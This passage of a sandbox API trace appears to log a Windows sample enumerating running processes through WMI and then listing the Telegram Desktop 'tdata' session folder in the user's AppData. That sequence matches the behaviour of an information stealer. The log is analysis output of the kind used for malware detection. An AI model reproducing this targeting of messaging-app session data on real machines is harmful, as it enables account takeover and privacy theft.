ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.823] IUnknown:Release (This=0x7428a0) returned 0x2 [0225.823] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.823] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7428a0) returned 0x0 [0225.823] IUnknown:AddRef (This=0x7428a0) returned 0x4 [0225.823] IUnknown:Release (This=0x7428a0) returned 0x3 [0225.823] IUnknown:Release (This=0x7428a0) returned 0x2 [0225.823] CoTaskMemFree (pv=0x5ed1bb8) [0225.824] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.824] IUnknown:AddRef (This=0x7428a0) returned 0x3 [0225.824] IWbemClassObject:Get (in: This=0x7428a0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.824] IWbemClassObject:Get (in: This=0x7428a0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3712\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.824] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3712\"") returned 0x66 [0225.824] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3712\"") returned 0x66 [0225.824] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.824] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.824] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.824] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.825] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1bb8) returned 0x0 [0225.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1bb8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.825] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1bb8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed11e8) returned 0x0 [0225.825] WbemDefPath:IUnknown:Release (This=0x5ed1bb8) returned 0x0 [0225.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed11e8) returned 0x0 [0225.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.826] WbemDefPath:IUnknown:AddRef (This=0x5ed11e8) returned 0x3 [0225.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1bc8) returned 0x0 [0225.826] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1bc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.826] WbemDefPath:IUnknown:Release (This=0x5ed1bc8) returned 0x3 [0225.826] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.826] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.826] WbemDefPath:IUnknown:Release (This=0x5ed11e8) returned 0x2 [0225.826] WbemDefPath:IUnknown:Release (This=0x5ed11e8) returned 0x1 [0225.826] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.826] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed11e8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed11e8) returned 0x0 [0225.826] WbemDefPath:IUnknown:AddRef (This=0x5ed11e8) returned 0x3 [0225.826] WbemDefPath:IUnknown:Release (This=0x5ed11e8) returned 0x2 [0225.826] WbemDefPath:IWbemPath:SetText (This=0x5ed11e8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3712\"") returned 0x0 [0225.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.826] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.826] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.827] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.827] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.827] IWbemClassObject:Get (in: This=0x7428a0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2575e54*=0, plFlavor=0x2575e58*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskeng.exe", varVal2=0x0), pType=0x2575e54*=8, plFlavor=0x2575e58*=0) returned 0x0 [0225.827] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0225.827] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0225.827] IWbemClassObject:Get (in: This=0x7428a0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2575e54*=8, plFlavor=0x2575e58*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskeng.exe", varVal2=0x0), pType=0x2575e54*=8, plFlavor=0x2575e58*=0) returned 0x0 [0225.827] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0225.827] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0225.827] CoTaskMemAlloc (cb=0x4) returned 0x5ed1bf8 [0225.827] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1bf8, puReturned=0x2569c44 | out: apObjects=0x5ed1bf8*=0x742a38, puReturned=0x2569c44*=0x1) returned 0x0 [0225.828] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742a38) returned 0x0 [0225.828] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.828] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.828] IUnknown:AddRef (This=0x742a38) returned 0x3 [0225.828] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.828] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.829] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742a3c) returned 0x0 [0225.829] IMarshal:GetUnmarshalClass (in: This=0x742a3c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.829] IUnknown:Release (This=0x742a3c) returned 0x3 [0225.829] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.829] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.829] IUnknown:QueryInterface (in: This=0x742a38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.829] IUnknown:Release (This=0x742a38) returned 0x2 [0225.829] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.829] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.829] IUnknown:QueryInterface (in: This=0x742a38, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742a38) returned 0x0 [0225.829] IUnknown:AddRef (This=0x742a38) returned 0x4 [0225.829] IUnknown:Release (This=0x742a38) returned 0x3 [0225.829] IUnknown:Release (This=0x742a38) returned 0x2 [0225.829] CoTaskMemFree (pv=0x5ed1bf8) [0225.829] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.829] IUnknown:AddRef (This=0x742a38) returned 0x3 [0225.829] IWbemClassObject:Get (in: This=0x742a38, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.830] IWbemClassObject:Get (in: This=0x742a38, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3780\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.830] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3780\"") returned 0x66 [0225.830] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3780\"") returned 0x66 [0225.830] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.830] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.830] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.830] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.831] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1bf8) returned 0x0 [0225.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1bf8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.831] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1bf8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed12c8) returned 0x0 [0225.831] WbemDefPath:IUnknown:Release (This=0x5ed1bf8) returned 0x0 [0225.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed12c8) returned 0x0 [0225.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.831] WbemDefPath:IUnknown:AddRef (This=0x5ed12c8) returned 0x3 [0225.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1c08) returned 0x0 [0225.832] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1c08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.832] WbemDefPath:IUnknown:Release (This=0x5ed1c08) returned 0x3 [0225.832] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.832] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.832] WbemDefPath:IUnknown:Release (This=0x5ed12c8) returned 0x2 [0225.832] WbemDefPath:IUnknown:Release (This=0x5ed12c8) returned 0x1 [0225.832] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.832] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed12c8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed12c8) returned 0x0 [0225.832] WbemDefPath:IUnknown:AddRef (This=0x5ed12c8) returned 0x3 [0225.832] WbemDefPath:IUnknown:Release (This=0x5ed12c8) returned 0x2 [0225.832] WbemDefPath:IWbemPath:SetText (This=0x5ed12c8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3780\"") returned 0x0 [0225.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.832] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.832] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.832] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.833] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.833] IWbemClassObject:Get (in: This=0x742a38, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25766c0*=0, plFlavor=0x25766c4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="AppLaunch.exe", varVal2=0x0), pType=0x25766c0*=8, plFlavor=0x25766c4*=0) returned 0x0 [0225.833] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0225.833] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0225.833] IWbemClassObject:Get (in: This=0x742a38, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25766c0*=8, plFlavor=0x25766c4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="AppLaunch.exe", varVal2=0x0), pType=0x25766c0*=8, plFlavor=0x25766c4*=0) returned 0x0 [0225.833] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0225.833] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0225.833] CoTaskMemAlloc (cb=0x4) returned 0x5ed1c38 [0225.833] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1c38, puReturned=0x2569c44 | out: apObjects=0x5ed1c38*=0x0, puReturned=0x2569c44*=0x0) returned 0x1 [0225.834] CoTaskMemFree (pv=0x5ed1c38) [0225.834] CoGetContextToken (in: pToken=0x36f0e8 | out: pToken=0x36f0e8) returned 0x0 [0225.834] IUnknown:Release (This=0x70f9f0) returned 0x1 [0225.834] IUnknown:Release (This=0x70f9f0) returned 0x0 [0225.835] CoGetContextToken (in: pToken=0x36f0e8 | out: pToken=0x36f0e8) returned 0x0 [0225.835] IUnknown:Release (This=0x70f928) returned 0x1 [0225.835] IUnknown:Release (This=0x70f928) returned 0x0 [0225.838] CoTaskMemAlloc (cb=0x20c) returned 0x796e90 [0225.838] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x796e90 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0225.838] CoTaskMemFree (pv=0x796e90) [0225.838] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x36ecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0225.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f240) returned 1 [0225.838] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x36ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0225.839] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x36eff0 | out: lpFindFileData=0x36eff0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, 